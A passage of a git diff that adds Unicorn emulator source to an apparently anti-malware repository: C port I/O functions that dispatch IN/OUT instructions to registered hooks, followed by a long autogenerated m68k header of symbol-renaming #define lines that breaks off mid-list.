HOOK_FOREACH_VAR_DECLARE; + HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { + if (hook->to_delete) + continue; + if (hook->insn == UC_X86_INS_OUT) + ((uc_cb_insn_out_t)hook->callback)(uc, addr, 2, val, hook->user_data); + } +} + +void cpu_outl(struct uc_struct *uc, pio_addr_t addr, uint32_t val) +{ + //LOG_IOPORT("outl: %04"FMT_pioaddr" %08"PRIx32"\n", addr, val); + // Unicorn: call registered OUT callbacks + struct hook *hook; + HOOK_FOREACH_VAR_DECLARE; + HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { + if (hook->to_delete) + continue; + if (hook->insn == UC_X86_INS_OUT) + ((uc_cb_insn_out_t)hook->callback)(uc, addr, 4, val, hook->user_data); + } +} + +uint8_t cpu_inb(struct uc_struct *uc, pio_addr_t addr) +{ + //LOG_IOPORT("inb : %04"FMT_pioaddr" %02"PRIx8"\n", addr, val); + // Unicorn: call registered IN callbacks + struct hook *hook; + HOOK_FOREACH_VAR_DECLARE; + HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { + if (hook->to_delete) + continue; + if (hook->insn == UC_X86_INS_IN) + return ((uc_cb_insn_in_t)hook->callback)(uc, addr, 1, hook->user_data); + } + + return 0; +} + +uint16_t cpu_inw(struct uc_struct *uc, pio_addr_t addr) +{ + //LOG_IOPORT("inw : %04"FMT_pioaddr" %04"PRIx16"\n", addr, val); + // Unicorn: call registered IN callbacks + struct hook *hook; + HOOK_FOREACH_VAR_DECLARE; + HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { + if (hook->to_delete) + continue; + if (hook->insn == UC_X86_INS_IN) + return ((uc_cb_insn_in_t)hook->callback)(uc, addr, 2, hook->user_data); + } + + return 0; +} + +uint32_t cpu_inl(struct uc_struct *uc, pio_addr_t addr) +{ + //LOG_IOPORT("inl : %04"FMT_pioaddr" %08"PRIx32"\n", addr, val); + // Unicorn: call registered IN callbacks + struct hook *hook; + HOOK_FOREACH_VAR_DECLARE; + HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { + if (hook->to_delete) + continue; + if (hook->insn == UC_X86_INS_IN) + return ((uc_cb_insn_in_t)hook->callback)(uc, addr, 4, hook->user_data); + } + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/m68k.h b/ai_anti_malware/unicorn/unicorn-master/qemu/m68k.h new file mode 100644 index 0000000..dffdf7e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/m68k.h @@ -0,0 +1,3020 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_M68K_H +#define UNICORN_AUTOGEN_M68K_H +#define arm_release arm_release_m68k +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_m68k +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_m68k +#define use_idiv_instructions_rt use_idiv_instructions_rt_m68k +#define tcg_target_deposit_valid tcg_target_deposit_valid_m68k +#define helper_power_down helper_power_down_m68k +#define check_exit_request check_exit_request_m68k +#define address_space_unregister address_space_unregister_m68k +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_m68k +#define phys_mem_clean phys_mem_clean_m68k +#define tb_cleanup tb_cleanup_m68k +#define memory_map memory_map_m68k +#define memory_map_ptr memory_map_ptr_m68k +#define memory_unmap memory_unmap_m68k +#define memory_free memory_free_m68k +#define free_code_gen_buffer free_code_gen_buffer_m68k +#define helper_raise_exception helper_raise_exception_m68k +#define tcg_enabled tcg_enabled_m68k +#define tcg_exec_init tcg_exec_init_m68k +#define memory_register_types memory_register_types_m68k +#define cpu_exec_init_all cpu_exec_init_all_m68k +#define vm_start vm_start_m68k +#define resume_all_vcpus resume_all_vcpus_m68k +#define a15_l2ctlr_read a15_l2ctlr_read_m68k +#define a64_translate_init a64_translate_init_m68k +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_m68k +#define aa64_cacheop_access aa64_cacheop_access_m68k +#define aa64_daif_access aa64_daif_access_m68k +#define aa64_daif_write aa64_daif_write_m68k +#define aa64_dczid_read aa64_dczid_read_m68k +#define aa64_fpcr_read aa64_fpcr_read_m68k +#define aa64_fpcr_write aa64_fpcr_write_m68k +#define aa64_fpsr_read aa64_fpsr_read_m68k +#define aa64_fpsr_write aa64_fpsr_write_m68k +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_m68k +#define aa64_zva_access aa64_zva_access_m68k +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_m68k +#define aarch64_restore_sp aarch64_restore_sp_m68k +#define aarch64_save_sp aarch64_save_sp_m68k +#define accel_find accel_find_m68k +#define accel_init_machine accel_init_machine_m68k +#define accel_type accel_type_m68k +#define access_with_adjusted_size access_with_adjusted_size_m68k +#define add128 add128_m68k +#define add16_sat add16_sat_m68k +#define add16_usat add16_usat_m68k +#define add192 add192_m68k +#define add8_sat add8_sat_m68k +#define add8_usat add8_usat_m68k +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_m68k +#define add_cpreg_to_list add_cpreg_to_list_m68k +#define addFloat128Sigs addFloat128Sigs_m68k +#define addFloat32Sigs addFloat32Sigs_m68k +#define addFloat64Sigs addFloat64Sigs_m68k +#define addFloatx80Sigs addFloatx80Sigs_m68k +#define add_qemu_ldst_label add_qemu_ldst_label_m68k +#define address_space_access_valid address_space_access_valid_m68k +#define address_space_destroy address_space_destroy_m68k +#define address_space_destroy_dispatch address_space_destroy_dispatch_m68k +#define address_space_get_flatview address_space_get_flatview_m68k +#define address_space_init address_space_init_m68k +#define address_space_init_dispatch address_space_init_dispatch_m68k +#define address_space_lookup_region address_space_lookup_region_m68k +#define address_space_map address_space_map_m68k +#define address_space_read address_space_read_m68k +#define address_space_rw address_space_rw_m68k +#define address_space_translate address_space_translate_m68k +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_m68k +#define address_space_translate_internal address_space_translate_internal_m68k +#define address_space_unmap address_space_unmap_m68k +#define address_space_update_topology address_space_update_topology_m68k +#define address_space_update_topology_pass address_space_update_topology_pass_m68k +#define address_space_write address_space_write_m68k +#define addrrange_contains addrrange_contains_m68k +#define addrrange_end addrrange_end_m68k +#define addrrange_equal addrrange_equal_m68k +#define addrrange_intersection addrrange_intersection_m68k +#define addrrange_intersects addrrange_intersects_m68k +#define addrrange_make addrrange_make_m68k +#define adjust_endianness adjust_endianness_m68k +#define all_helpers all_helpers_m68k +#define alloc_code_gen_buffer alloc_code_gen_buffer_m68k +#define alloc_entry alloc_entry_m68k +#define always_true always_true_m68k +#define arm1026_initfn arm1026_initfn_m68k +#define arm1136_initfn arm1136_initfn_m68k +#define arm1136_r2_initfn arm1136_r2_initfn_m68k +#define arm1176_initfn arm1176_initfn_m68k +#define arm11mpcore_initfn arm11mpcore_initfn_m68k +#define arm926_initfn arm926_initfn_m68k +#define arm946_initfn arm946_initfn_m68k +#define arm_ccnt_enabled arm_ccnt_enabled_m68k +#define arm_cp_read_zero arm_cp_read_zero_m68k +#define arm_cp_reset_ignore arm_cp_reset_ignore_m68k +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_m68k +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_m68k +#define arm_cpu_finalizefn arm_cpu_finalizefn_m68k +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_m68k +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_m68k +#define arm_cpu_initfn arm_cpu_initfn_m68k +#define arm_cpu_list arm_cpu_list_m68k +#define cpu_loop_exit cpu_loop_exit_m68k +#define arm_cpu_post_init arm_cpu_post_init_m68k +#define arm_cpu_realizefn arm_cpu_realizefn_m68k +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_m68k +#define arm_cpu_register_types arm_cpu_register_types_m68k +#define cpu_resume_from_signal cpu_resume_from_signal_m68k +#define arm_cpus arm_cpus_m68k +#define arm_cpu_set_pc arm_cpu_set_pc_m68k +#define arm_cp_write_ignore arm_cp_write_ignore_m68k +#define arm_current_el arm_current_el_m68k +#define arm_dc_feature arm_dc_feature_m68k +#define arm_debug_excp_handler arm_debug_excp_handler_m68k +#define arm_debug_target_el arm_debug_target_el_m68k +#define arm_el_is_aa64 arm_el_is_aa64_m68k +#define arm_env_get_cpu arm_env_get_cpu_m68k +#define arm_excp_target_el arm_excp_target_el_m68k +#define arm_excp_unmasked arm_excp_unmasked_m68k +#define arm_feature arm_feature_m68k +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_m68k +#define gen_intermediate_code gen_intermediate_code_m68k +#define gen_intermediate_code_pc gen_intermediate_code_pc_m68k +#define arm_gen_test_cc arm_gen_test_cc_m68k +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_m68k +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_m68k +#define arm_handle_psci_call arm_handle_psci_call_m68k +#define arm_is_psci_call arm_is_psci_call_m68k +#define arm_is_secure arm_is_secure_m68k +#define arm_is_secure_below_el3 arm_is_secure_below_el3_m68k +#define arm_ldl_code arm_ldl_code_m68k +#define arm_lduw_code arm_lduw_code_m68k +#define arm_log_exception arm_log_exception_m68k +#define arm_reg_read arm_reg_read_m68k +#define arm_reg_reset arm_reg_reset_m68k +#define arm_reg_write arm_reg_write_m68k +#define restore_state_to_opc restore_state_to_opc_m68k +#define arm_rmode_to_sf arm_rmode_to_sf_m68k +#define arm_singlestep_active arm_singlestep_active_m68k +#define tlb_fill tlb_fill_m68k +#define tlb_flush tlb_flush_m68k +#define tlb_flush_page tlb_flush_page_m68k +#define tlb_set_page tlb_set_page_m68k +#define arm_translate_init arm_translate_init_m68k +#define arm_v7m_class_init arm_v7m_class_init_m68k +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_m68k +#define ats_access ats_access_m68k +#define ats_write ats_write_m68k +#define bad_mode_switch bad_mode_switch_m68k +#define bank_number bank_number_m68k +#define bitmap_zero_extend bitmap_zero_extend_m68k +#define bp_wp_matches bp_wp_matches_m68k +#define breakpoint_invalidate breakpoint_invalidate_m68k +#define build_page_bitmap build_page_bitmap_m68k +#define bus_add_child bus_add_child_m68k +#define bus_class_init bus_class_init_m68k +#define bus_info bus_info_m68k +#define bus_unparent bus_unparent_m68k +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_m68k +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_m68k +#define cache_test_clean_cp_reginfo cache_test_clean_cp_reginfo_m68k +#define call_recip_estimate call_recip_estimate_m68k +#define can_merge can_merge_m68k +#define capacity_increase capacity_increase_m68k +#define ccsidr_read ccsidr_read_m68k +#define check_ap check_ap_m68k +#define check_breakpoints check_breakpoints_m68k +#define check_watchpoints check_watchpoints_m68k +#define cho cho_m68k +#define clear_bit clear_bit_m68k +#define clz32 clz32_m68k +#define clz64 clz64_m68k +#define cmp_flatrange_addr cmp_flatrange_addr_m68k +#define code_gen_alloc code_gen_alloc_m68k +#define commonNaNToFloat128 commonNaNToFloat128_m68k +#define commonNaNToFloat16 commonNaNToFloat16_m68k +#define commonNaNToFloat32 commonNaNToFloat32_m68k +#define commonNaNToFloat64 commonNaNToFloat64_m68k +#define commonNaNToFloatx80 commonNaNToFloatx80_m68k +#define compute_abs_deadline compute_abs_deadline_m68k +#define cond_name cond_name_m68k +#define configure_accelerator configure_accelerator_m68k +#define container_get container_get_m68k +#define container_info container_info_m68k +#define container_register_types container_register_types_m68k +#define contextidr_write contextidr_write_m68k +#define core_log_global_start core_log_global_start_m68k +#define core_log_global_stop core_log_global_stop_m68k +#define core_memory_listener core_memory_listener_m68k +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_m68k +#define cortex_a15_initfn cortex_a15_initfn_m68k +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_m68k +#define cortex_a8_initfn cortex_a8_initfn_m68k +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_m68k +#define cortex_a9_initfn cortex_a9_initfn_m68k +#define cortex_m3_initfn cortex_m3_initfn_m68k +#define count_cpreg count_cpreg_m68k +#define countLeadingZeros32 countLeadingZeros32_m68k +#define countLeadingZeros64 countLeadingZeros64_m68k +#define cp_access_ok cp_access_ok_m68k +#define cpacr_write cpacr_write_m68k +#define cpreg_field_is_64bit cpreg_field_is_64bit_m68k +#define cp_reginfo cp_reginfo_m68k +#define cpreg_key_compare cpreg_key_compare_m68k +#define cpreg_make_keylist cpreg_make_keylist_m68k +#define cp_reg_reset cp_reg_reset_m68k +#define cpreg_to_kvm_id cpreg_to_kvm_id_m68k +#define cpsr_read cpsr_read_m68k +#define cpsr_write cpsr_write_m68k +#define cptype_valid cptype_valid_m68k +#define cpu_abort cpu_abort_m68k +#define cpu_arm_exec cpu_arm_exec_m68k +#define cpu_arm_gen_code cpu_arm_gen_code_m68k +#define cpu_arm_init cpu_arm_init_m68k +#define cpu_breakpoint_insert cpu_breakpoint_insert_m68k +#define cpu_breakpoint_remove cpu_breakpoint_remove_m68k +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_m68k +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_m68k +#define cpu_can_do_io cpu_can_do_io_m68k +#define cpu_can_run cpu_can_run_m68k +#define cpu_class_init cpu_class_init_m68k +#define cpu_common_class_by_name cpu_common_class_by_name_m68k +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_m68k +#define cpu_common_get_arch_id cpu_common_get_arch_id_m68k +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_m68k +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_m68k +#define cpu_common_has_work cpu_common_has_work_m68k +#define cpu_common_initfn cpu_common_initfn_m68k +#define cpu_common_noop cpu_common_noop_m68k +#define cpu_common_parse_features cpu_common_parse_features_m68k +#define cpu_common_realizefn cpu_common_realizefn_m68k +#define cpu_common_reset cpu_common_reset_m68k +#define cpu_dump_statistics cpu_dump_statistics_m68k +#define cpu_exec_init cpu_exec_init_m68k +#define cpu_flush_icache_range cpu_flush_icache_range_m68k +#define cpu_gen_init cpu_gen_init_m68k +#define cpu_get_clock cpu_get_clock_m68k +#define cpu_get_real_ticks cpu_get_real_ticks_m68k +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_m68k +#define cpu_handle_debug_exception cpu_handle_debug_exception_m68k +#define cpu_handle_guest_debug cpu_handle_guest_debug_m68k +#define cpu_inb cpu_inb_m68k +#define cpu_inl cpu_inl_m68k +#define cpu_interrupt cpu_interrupt_m68k +#define cpu_interrupt_handler cpu_interrupt_handler_m68k +#define cpu_inw cpu_inw_m68k +#define cpu_io_recompile cpu_io_recompile_m68k +#define cpu_is_stopped cpu_is_stopped_m68k +#define cpu_ldl_code cpu_ldl_code_m68k +#define cpu_ldub_code cpu_ldub_code_m68k +#define cpu_lduw_code cpu_lduw_code_m68k +#define cpu_memory_rw_debug cpu_memory_rw_debug_m68k +#define cpu_mmu_index cpu_mmu_index_m68k +#define cpu_outb cpu_outb_m68k +#define cpu_outl cpu_outl_m68k +#define cpu_outw cpu_outw_m68k +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_m68k +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_m68k +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_m68k +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_m68k +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_m68k +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_m68k +#define cpu_physical_memory_map cpu_physical_memory_map_m68k +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_m68k +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_m68k +#define cpu_physical_memory_rw cpu_physical_memory_rw_m68k +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_m68k +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_m68k +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_m68k +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_m68k +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_m68k +#define cpu_register cpu_register_m68k +#define cpu_register_types cpu_register_types_m68k +#define cpu_restore_state cpu_restore_state_m68k +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_m68k +#define cpu_single_step cpu_single_step_m68k +#define cpu_tb_exec cpu_tb_exec_m68k +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_m68k +#define cpu_to_be64 cpu_to_be64_m68k +#define cpu_to_le32 cpu_to_le32_m68k +#define cpu_to_le64 cpu_to_le64_m68k +#define cpu_type_info cpu_type_info_m68k +#define cpu_unassigned_access cpu_unassigned_access_m68k +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_m68k +#define cpu_watchpoint_insert cpu_watchpoint_insert_m68k +#define cpu_watchpoint_remove cpu_watchpoint_remove_m68k +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_m68k +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_m68k +#define crc32c_table crc32c_table_m68k +#define create_new_memory_mapping create_new_memory_mapping_m68k +#define csselr_write csselr_write_m68k +#define cto32 cto32_m68k +#define ctr_el0_access ctr_el0_access_m68k +#define ctz32 ctz32_m68k +#define ctz64 ctz64_m68k +#define dacr_write dacr_write_m68k +#define dbgbcr_write dbgbcr_write_m68k +#define dbgbvr_write dbgbvr_write_m68k +#define dbgwcr_write dbgwcr_write_m68k +#define dbgwvr_write dbgwvr_write_m68k +#define debug_cp_reginfo debug_cp_reginfo_m68k +#define debug_frame debug_frame_m68k +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_m68k +#define define_arm_cp_regs define_arm_cp_regs_m68k +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_m68k +#define define_debug_regs define_debug_regs_m68k +#define define_one_arm_cp_reg define_one_arm_cp_reg_m68k +#define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_m68k +#define deposit32 deposit32_m68k +#define deposit64 deposit64_m68k +#define deregister_tm_clones deregister_tm_clones_m68k +#define device_class_base_init device_class_base_init_m68k +#define device_class_init device_class_init_m68k +#define device_finalize device_finalize_m68k +#define device_get_realized device_get_realized_m68k +#define device_initfn device_initfn_m68k +#define device_post_init device_post_init_m68k +#define device_reset device_reset_m68k +#define device_set_realized device_set_realized_m68k +#define device_type_info device_type_info_m68k +#define disas_arm_insn disas_arm_insn_m68k +#define disas_coproc_insn disas_coproc_insn_m68k +#define disas_dsp_insn disas_dsp_insn_m68k +#define disas_iwmmxt_insn disas_iwmmxt_insn_m68k +#define disas_neon_data_insn disas_neon_data_insn_m68k +#define disas_neon_ls_insn disas_neon_ls_insn_m68k +#define disas_thumb2_insn disas_thumb2_insn_m68k +#define disas_thumb_insn disas_thumb_insn_m68k +#define disas_vfp_insn disas_vfp_insn_m68k +#define disas_vfp_v8_insn disas_vfp_v8_insn_m68k +#define do_arm_semihosting do_arm_semihosting_m68k +#define do_clz16 do_clz16_m68k +#define do_clz8 do_clz8_m68k +#define do_constant_folding do_constant_folding_m68k +#define do_constant_folding_2 do_constant_folding_2_m68k +#define do_constant_folding_cond do_constant_folding_cond_m68k +#define do_constant_folding_cond2 do_constant_folding_cond2_m68k +#define do_constant_folding_cond_32 do_constant_folding_cond_32_m68k +#define do_constant_folding_cond_64 do_constant_folding_cond_64_m68k +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_m68k +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_m68k +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_m68k +#define do_ssat do_ssat_m68k +#define do_usad do_usad_m68k +#define do_usat do_usat_m68k +#define do_v7m_exception_exit do_v7m_exception_exit_m68k +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_m68k +#define dummy_func dummy_func_m68k +#define dummy_section dummy_section_m68k +#define _DYNAMIC _DYNAMIC_m68k +#define _edata _edata_m68k +#define _end _end_m68k +#define end_list end_list_m68k +#define eq128 eq128_m68k +#define ErrorClass_lookup ErrorClass_lookup_m68k +#define error_copy error_copy_m68k +#define error_exit error_exit_m68k +#define error_get_class error_get_class_m68k +#define error_get_pretty error_get_pretty_m68k +#define error_setg_file_open error_setg_file_open_m68k +#define estimateDiv128To64 estimateDiv128To64_m68k +#define estimateSqrt32 estimateSqrt32_m68k +#define excnames excnames_m68k +#define excp_is_internal excp_is_internal_m68k +#define extended_addresses_enabled extended_addresses_enabled_m68k +#define extended_mpu_ap_bits extended_mpu_ap_bits_m68k +#define extract32 extract32_m68k +#define extract64 extract64_m68k +#define extractFloat128Exp extractFloat128Exp_m68k +#define extractFloat128Frac0 extractFloat128Frac0_m68k +#define extractFloat128Frac1 extractFloat128Frac1_m68k +#define extractFloat128Sign extractFloat128Sign_m68k +#define extractFloat16Exp extractFloat16Exp_m68k +#define extractFloat16Frac extractFloat16Frac_m68k +#define extractFloat16Sign extractFloat16Sign_m68k +#define extractFloat32Exp extractFloat32Exp_m68k +#define extractFloat32Frac extractFloat32Frac_m68k +#define extractFloat32Sign extractFloat32Sign_m68k +#define extractFloat64Exp extractFloat64Exp_m68k +#define extractFloat64Frac extractFloat64Frac_m68k +#define extractFloat64Sign extractFloat64Sign_m68k +#define extractFloatx80Exp extractFloatx80Exp_m68k +#define extractFloatx80Frac extractFloatx80Frac_m68k +#define extractFloatx80Sign extractFloatx80Sign_m68k +#define fcse_write fcse_write_m68k +#define find_better_copy find_better_copy_m68k +#define find_default_machine find_default_machine_m68k +#define find_desc_by_name find_desc_by_name_m68k +#define find_first_bit find_first_bit_m68k +#define find_paging_enabled_cpu find_paging_enabled_cpu_m68k +#define find_ram_block find_ram_block_m68k +#define find_ram_offset find_ram_offset_m68k +#define find_string find_string_m68k +#define find_type find_type_m68k +#define _fini _fini_m68k +#define flatrange_equal flatrange_equal_m68k +#define flatview_destroy flatview_destroy_m68k +#define flatview_init flatview_init_m68k +#define flatview_insert flatview_insert_m68k +#define flatview_lookup flatview_lookup_m68k +#define flatview_ref flatview_ref_m68k +#define flatview_simplify flatview_simplify_m68k +#define flatview_unref flatview_unref_m68k +#define float128_add float128_add_m68k +#define float128_compare float128_compare_m68k +#define float128_compare_internal float128_compare_internal_m68k +#define float128_compare_quiet float128_compare_quiet_m68k +#define float128_default_nan float128_default_nan_m68k +#define float128_div float128_div_m68k +#define float128_eq float128_eq_m68k +#define float128_eq_quiet float128_eq_quiet_m68k +#define float128_is_quiet_nan float128_is_quiet_nan_m68k +#define float128_is_signaling_nan float128_is_signaling_nan_m68k +#define float128_le float128_le_m68k +#define float128_le_quiet float128_le_quiet_m68k +#define float128_lt float128_lt_m68k +#define float128_lt_quiet float128_lt_quiet_m68k +#define float128_maybe_silence_nan float128_maybe_silence_nan_m68k +#define float128_mul float128_mul_m68k +#define float128_rem float128_rem_m68k +#define float128_round_to_int float128_round_to_int_m68k +#define float128_scalbn float128_scalbn_m68k +#define float128_sqrt float128_sqrt_m68k +#define float128_sub float128_sub_m68k +#define float128ToCommonNaN float128ToCommonNaN_m68k +#define float128_to_float32 float128_to_float32_m68k +#define float128_to_float64 float128_to_float64_m68k +#define float128_to_floatx80 float128_to_floatx80_m68k +#define float128_to_int32 float128_to_int32_m68k +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_m68k +#define float128_to_int64 float128_to_int64_m68k +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_m68k +#define float128_unordered float128_unordered_m68k +#define float128_unordered_quiet float128_unordered_quiet_m68k +#define float16_default_nan float16_default_nan_m68k +#define float16_is_quiet_nan float16_is_quiet_nan_m68k +#define float16_is_signaling_nan float16_is_signaling_nan_m68k +#define float16_maybe_silence_nan float16_maybe_silence_nan_m68k +#define float16ToCommonNaN float16ToCommonNaN_m68k +#define float16_to_float32 float16_to_float32_m68k +#define float16_to_float64 float16_to_float64_m68k +#define float32_abs float32_abs_m68k +#define float32_add float32_add_m68k +#define float32_chs float32_chs_m68k +#define float32_compare float32_compare_m68k +#define float32_compare_internal float32_compare_internal_m68k +#define float32_compare_quiet float32_compare_quiet_m68k +#define float32_default_nan float32_default_nan_m68k +#define float32_div float32_div_m68k +#define float32_eq float32_eq_m68k +#define float32_eq_quiet float32_eq_quiet_m68k +#define float32_exp2 float32_exp2_m68k +#define float32_exp2_coefficients float32_exp2_coefficients_m68k +#define float32_is_any_nan float32_is_any_nan_m68k +#define float32_is_infinity float32_is_infinity_m68k +#define float32_is_neg float32_is_neg_m68k +#define float32_is_quiet_nan float32_is_quiet_nan_m68k +#define float32_is_signaling_nan float32_is_signaling_nan_m68k +#define float32_is_zero float32_is_zero_m68k +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_m68k +#define float32_le float32_le_m68k +#define float32_le_quiet float32_le_quiet_m68k +#define float32_log2 float32_log2_m68k +#define float32_lt float32_lt_m68k +#define float32_lt_quiet float32_lt_quiet_m68k +#define float32_max float32_max_m68k +#define float32_maxnum float32_maxnum_m68k +#define float32_maxnummag float32_maxnummag_m68k +#define float32_maybe_silence_nan float32_maybe_silence_nan_m68k +#define float32_min float32_min_m68k +#define float32_minmax float32_minmax_m68k +#define float32_minnum float32_minnum_m68k +#define float32_minnummag float32_minnummag_m68k +#define float32_mul float32_mul_m68k +#define float32_muladd float32_muladd_m68k +#define float32_rem float32_rem_m68k +#define float32_round_to_int float32_round_to_int_m68k +#define float32_scalbn float32_scalbn_m68k +#define float32_set_sign float32_set_sign_m68k +#define float32_sqrt float32_sqrt_m68k +#define float32_squash_input_denormal float32_squash_input_denormal_m68k +#define float32_sub float32_sub_m68k +#define float32ToCommonNaN float32ToCommonNaN_m68k +#define float32_to_float128 float32_to_float128_m68k +#define float32_to_float16 float32_to_float16_m68k +#define float32_to_float64 float32_to_float64_m68k +#define float32_to_floatx80 float32_to_floatx80_m68k +#define float32_to_int16 float32_to_int16_m68k +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_m68k +#define float32_to_int32 float32_to_int32_m68k +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_m68k +#define float32_to_int64 float32_to_int64_m68k +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_m68k +#define float32_to_uint16 float32_to_uint16_m68k +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_m68k +#define float32_to_uint32 float32_to_uint32_m68k +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_m68k +#define float32_to_uint64 float32_to_uint64_m68k +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_m68k +#define float32_unordered float32_unordered_m68k +#define float32_unordered_quiet float32_unordered_quiet_m68k +#define float64_abs float64_abs_m68k +#define float64_add float64_add_m68k +#define float64_chs float64_chs_m68k +#define float64_compare float64_compare_m68k +#define float64_compare_internal float64_compare_internal_m68k +#define float64_compare_quiet float64_compare_quiet_m68k +#define float64_default_nan float64_default_nan_m68k +#define float64_div float64_div_m68k +#define float64_eq float64_eq_m68k +#define float64_eq_quiet float64_eq_quiet_m68k +#define float64_is_any_nan float64_is_any_nan_m68k +#define float64_is_infinity float64_is_infinity_m68k +#define float64_is_neg float64_is_neg_m68k +#define float64_is_quiet_nan float64_is_quiet_nan_m68k +#define float64_is_signaling_nan float64_is_signaling_nan_m68k +#define float64_is_zero float64_is_zero_m68k +#define float64_le float64_le_m68k +#define float64_le_quiet float64_le_quiet_m68k +#define float64_log2 float64_log2_m68k +#define float64_lt float64_lt_m68k +#define float64_lt_quiet float64_lt_quiet_m68k +#define float64_max float64_max_m68k +#define float64_maxnum float64_maxnum_m68k +#define float64_maxnummag float64_maxnummag_m68k +#define float64_maybe_silence_nan float64_maybe_silence_nan_m68k +#define float64_min float64_min_m68k +#define float64_minmax float64_minmax_m68k +#define float64_minnum float64_minnum_m68k +#define float64_minnummag float64_minnummag_m68k +#define float64_mul float64_mul_m68k +#define float64_muladd float64_muladd_m68k +#define float64_rem float64_rem_m68k +#define float64_round_to_int float64_round_to_int_m68k +#define float64_scalbn float64_scalbn_m68k +#define float64_set_sign float64_set_sign_m68k +#define float64_sqrt float64_sqrt_m68k +#define float64_squash_input_denormal float64_squash_input_denormal_m68k +#define float64_sub float64_sub_m68k +#define float64ToCommonNaN float64ToCommonNaN_m68k +#define float64_to_float128 float64_to_float128_m68k +#define float64_to_float16 float64_to_float16_m68k +#define float64_to_float32 float64_to_float32_m68k +#define float64_to_floatx80 float64_to_floatx80_m68k +#define float64_to_int16 float64_to_int16_m68k +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_m68k +#define float64_to_int32 float64_to_int32_m68k +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_m68k +#define float64_to_int64 float64_to_int64_m68k +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_m68k +#define float64_to_uint16 float64_to_uint16_m68k +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_m68k +#define float64_to_uint32 float64_to_uint32_m68k +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_m68k +#define float64_to_uint64 float64_to_uint64_m68k +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_m68k +#define float64_trunc_to_int float64_trunc_to_int_m68k +#define float64_unordered float64_unordered_m68k +#define float64_unordered_quiet float64_unordered_quiet_m68k +#define float_raise float_raise_m68k +#define floatx80_add floatx80_add_m68k +#define floatx80_compare floatx80_compare_m68k +#define floatx80_compare_internal floatx80_compare_internal_m68k +#define floatx80_compare_quiet floatx80_compare_quiet_m68k +#define floatx80_default_nan floatx80_default_nan_m68k +#define floatx80_div floatx80_div_m68k +#define floatx80_eq floatx80_eq_m68k +#define 